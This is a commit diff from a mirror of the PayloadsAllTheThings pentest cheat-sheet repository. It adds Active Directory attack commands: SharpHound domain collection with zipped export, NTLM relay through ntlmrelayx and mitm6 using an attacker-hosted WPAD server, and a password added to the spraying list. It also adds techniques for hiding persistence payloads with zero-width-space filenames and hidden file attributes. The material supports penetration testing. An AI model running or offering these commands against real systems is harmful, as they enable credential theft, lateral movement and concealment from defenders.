ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

BloodHound ZIP + Zero Width space tip

Browse Source
This commit is contained in:
Swissky 2020-01-19 22:46:45 +01:00
parent 590b7681e4
commit be0397fa68
3 changed files with 19 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

9
Methodology and Resources/Active Directory Attack.md
View File

@ -77,6 +77,8 @@
SharpHound.exe (from resources/Ingestor) SharpHound.exe (from resources/Ingestor)
SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100 SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100 SharpHound.exe -c all -d active.htb --LdapUser myuser --LdapPass mypass --domaincontroller 10.10.10.100
SharpHound.exe -c all -d active.htb -SearchForest
SharpHound.exe --EncryptZip --ZipFilename export.zip
or or
Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
or or
@ -112,6 +114,7 @@
# -wh: Server hosting WPAD file (Attackers IP) # -wh: Server hosting WPAD file (Attackers IP)
# -t: Target (You cannot relay credentials to the same device that youre spoofing) # -t: Target (You cannot relay credentials to the same device that youre spoofing)
# -i: open an interactive shell # -i: open an interactive shell
ntlmrelayx.py -t ldaps://lab.local -wh attacker-wpad --delegate-access
``` ```
* [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon) * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
@ -540,7 +543,7 @@ Password spraying refers to the attack method that takes a large number of usern
Most of the time the best passwords to spray are : Most of the time the best passwords to spray are :
- Password123, mimikatz - P@ssw0rd01, Password123, mimikatz
- Welcome1/Welcome01 - Welcome1/Welcome01
- $Companyname1 : $Microsoft1 - $Companyname1 : $Microsoft1
- SeasonYear : Winter2019*,Spring2020!,Summer2018? - SeasonYear : Winter2019*,Spring2020!,Summer2018?
@ -936,9 +939,9 @@ cme smb $hosts --gen-relay-list relay.txt
mitm6 -i eth0 -d $domain mitm6 -i eth0 -d $domain
# spoofing WPAD and relaying NTLM credentials # spoofing WPAD and relaying NTLM credentials
http://ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt ntlmrelayx.py -6 -wh $attacker_ip -of loot -tf relay.txt
or or
http://ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug ntlmrelayx.py -6 -wh $attacker_ip -l /tmp -socks -debug
``` ```
#### Drop the MIC #### Drop the MIC

8
Methodology and Resources/Linux - Persistence.md
View File

@ -137,10 +137,16 @@ Add an ssh key into the `~/.ssh` folder.
Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload. Hide the payload with ANSI chars, the following chars will clear the terminal when using cat to display the content of your payload.
```bash ```powershell
## Do not remove. Generated from /etc/issue.conf by configure. ## Do not remove. Generated from /etc/issue.conf by configure.
``` ```
Hide in plain sight using zero width spaces in filename.
```powershell
touch $(echo -n 'index\u200D.php') index.php
```
Clear the last line of the history. Clear the last line of the history.
```bash ```bash

6
Methodology and Resources/Windows - Persistence.md
View File

@ -21,6 +21,12 @@
## Userland ## Userland
Set a file as hidden
```powershell
attrib +h c:\autoexec.bat
```
### Registry ### Registry
Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows. Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.